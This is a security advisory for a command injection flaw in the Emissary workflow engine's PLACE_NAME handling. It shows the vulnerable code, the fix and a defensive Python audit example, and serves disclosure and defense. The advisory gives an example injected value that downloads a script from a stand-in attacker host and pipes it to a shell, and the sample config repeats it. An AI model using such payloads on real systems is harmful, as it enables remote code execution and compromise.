7.2
Emissary Workflow Engine Exposes User Data to Command Injection
CVE-2026-35581
GHSA-6c37-7w4p-jg9v
Summary
Emissary's `Executrix` utility class builds `/bin/sh -c` command strings from configuration-derived values, including the `PLACE_NAME` parameter, after replacing only spaces with underscores. Shell metacharacters in a `PLACE_NAME` value therefore reach the shell unchanged and allow arbitrary command execution on the Emissary host, which can lead to data theft or full system compromise. Exploitation requires the ability to control configuration values (for example administrative access or a compromised configuration source). To protect your system, update to version 8.39.0 or later.
What to do
- Update gov.nsa.emissary:emissary to version 8.39.0 or later.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | gov.nsa.emissary:emissary | < 8.39.0 | 8.39.0 |
Original title
Emissary has a Command Injection via PLACE_NAME Configuration in Executrix
Original description
## Summary
The `Executrix` utility class constructed shell commands by concatenating
configuration-derived values — including the `PLACE_NAME` parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through
into `/bin/sh -c` command execution.
## Details
### Vulnerable code — `Executrix.java`
**Insufficient sanitization (line 132):**
```java
this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through
```
**Shell sink (line 1052–1058):**
```java
protected String[] getTimedCommand(final String c) {
    // tmpNames[DIR] is derived from placeName and is interpolated unquoted into a shell script string
    return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}
```
### Data flow
1. `PLACE_NAME` is read from a configuration file
2. `Executrix` applies only a space-to-underscore replacement
3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)
4. `tmpNames[DIR]` is concatenated into a shell command string
5. The command is executed via `/bin/sh -c`
### Example payload
```
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
```
After the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`
(semicolons, pipes, and other metacharacters preserved)
### Impact
- Arbitrary command execution on the Emissary host
- Requires the ability to control configuration values (e.g., administrative
access or a compromised configuration source)
## Remediation
Fixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),
merged into release 8.39.0.
The space-only replacement was replaced with an allowlist regex that replaces every
character not matching `[a-zA-Z0-9_-]` with an underscore:
```java
import java.util.regex.Pattern;

// Any character outside the allowlist [a-zA-Z0-9_-] is rewritten to "_"
protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");

protected static String cleanPlaceName(final String placeName) {
    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}
```
This ensures that any shell metacharacter in the `PLACE_NAME` configuration
value is replaced with an underscore before it can reach a command string.
Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.
## Workarounds
If upgrading is not immediately possible, ensure that `PLACE_NAME` values in all
configuration files contain only alphanumeric characters, underscores, and hyphens.
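The following is an added example, not code from the Emissary project or from the advisory. It models the two sanitizers described above (space-only replacement versus the 8.39.0 allowlist) and the argument-vector shape of the `/bin/sh -c` sink, counts how many simple commands a POSIX shell would actually run for the advisory's example payload under each sanitizer, and then implements the workaround check as an audit over configuration lines. The temporary-directory join (`/tmp/emissary/<placeName>`), the `KEY = "value"` config line form and the sample configuration text are assumptions made for illustration; the advisory only states that `placeName` feeds `tmpNames[DIR]`.

```python
import re
import shlex

# Added example (not Emissary code): models the two sanitizers from the advisory,
# the shape of the /bin/sh -c sink, and a config audit for the workaround.

# Pre-8.39.0 behaviour: only spaces are replaced.
def clean_place_name_old(place_name: str) -> str:
    return place_name.replace(" ", "_")

# 8.39.0 behaviour: every character outside [a-zA-Z0-9_-] becomes "_".
INVALID_PLACE_NAME_CHARS = re.compile(r"[^a-zA-Z0-9_-]")

def clean_place_name_new(place_name: str) -> str:
    return INVALID_PLACE_NAME_CHARS.sub("_", place_name)

# Assumption: the temp directory is <base>/<placeName>. The advisory only says
# placeName feeds tmpNames[DIR], not how the path is joined.
TMP_BASE = "/tmp/emissary"

def timed_command(place_name: str, c: str, cleaner) -> list[str]:
    """Argument vector shaped like getTimedCommand: ["/bin/sh", "-c", <script>]."""
    tmp_dir = f"{TMP_BASE}/{cleaner(place_name)}"
    return ["/bin/sh", "-c", f"ulimit -c 0; cd {tmp_dir}; {c}"]

SHELL_SEPARATORS = {";", "|", "||", "&&", "&"}

def simple_command_count(script: str) -> int:
    """Number of simple commands a POSIX shell would run for `script`.

    shlex with punctuation_chars=True returns ';', '|', '&&' and friends as
    their own tokens, so counting them (plus one) counts the commands.
    """
    lexer = shlex.shlex(script, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return 1 + sum(1 for tok in lexer if tok in SHELL_SEPARATORS)

PAYLOAD = "test;curl attacker.com/shell.sh|bash;x"   # the advisory's example payload

def command_counts(place_name: str = PAYLOAD, c: str = "true") -> tuple[int, int]:
    """(commands run with the old sanitizer, commands run with the new one)."""
    old = simple_command_count(timed_command(place_name, c, clean_place_name_old)[2])
    new = simple_command_count(timed_command(place_name, c, clean_place_name_new)[2])
    return old, new

# Workaround audit: report PLACE_NAME values that violate the allowlist.
# Assumption: config lines have the form KEY = "value", as in the advisory's example.
PLACE_NAME_LINE = re.compile(r'^\s*PLACE_NAME\s*=\s*"?(.*?)"?\s*$')

def find_unsafe_place_names(config_text: str) -> list[tuple[int, str]]:
    """Return (line number, value) for each PLACE_NAME containing a char outside [a-zA-Z0-9_-]."""
    unsafe = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        m = PLACE_NAME_LINE.match(line)
        if m and INVALID_PLACE_NAME_CHARS.search(m.group(1)):
            unsafe.append((lineno, m.group(1)))
    return unsafe

# Constructed sample config for the audit; not taken from any real deployment.
SAMPLE_CONFIG = """\
# constructed sample
PLACE_NAME = "SimplePlace"
PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"
OTHER_KEY = "unrelated"
PLACE_NAME = "needs-no_change"
"""

if __name__ == "__main__":
    old, new = command_counts()
    print("old sanitizer:", clean_place_name_old(PAYLOAD), "->", old, "commands")
    print("new sanitizer:", clean_place_name_new(PAYLOAD), "->", new, "commands")
    for lineno, value in find_unsafe_place_names(SAMPLE_CONFIG):
        print(f"line {lineno}: unsafe PLACE_NAME {value!r}")
```

With the space-only sanitizer the script handed to `sh -c` contains six simple commands (the intended `ulimit`, `cd` and `true` plus the injected `curl`, `bash` and `x`); with the allowlist it contains three. The audit flags only the third sample line, since hyphens and underscores are permitted by the workaround.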
## References
- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)
- Original report: GHSA-wjqm-p579-x3ww
NVD CVSS 3.1
7.2
Vulnerability type
CWE-78
OS Command Injection
Published: 8 Apr 2026 · Updated: 8 Apr 2026 · First seen: 7 Apr 2026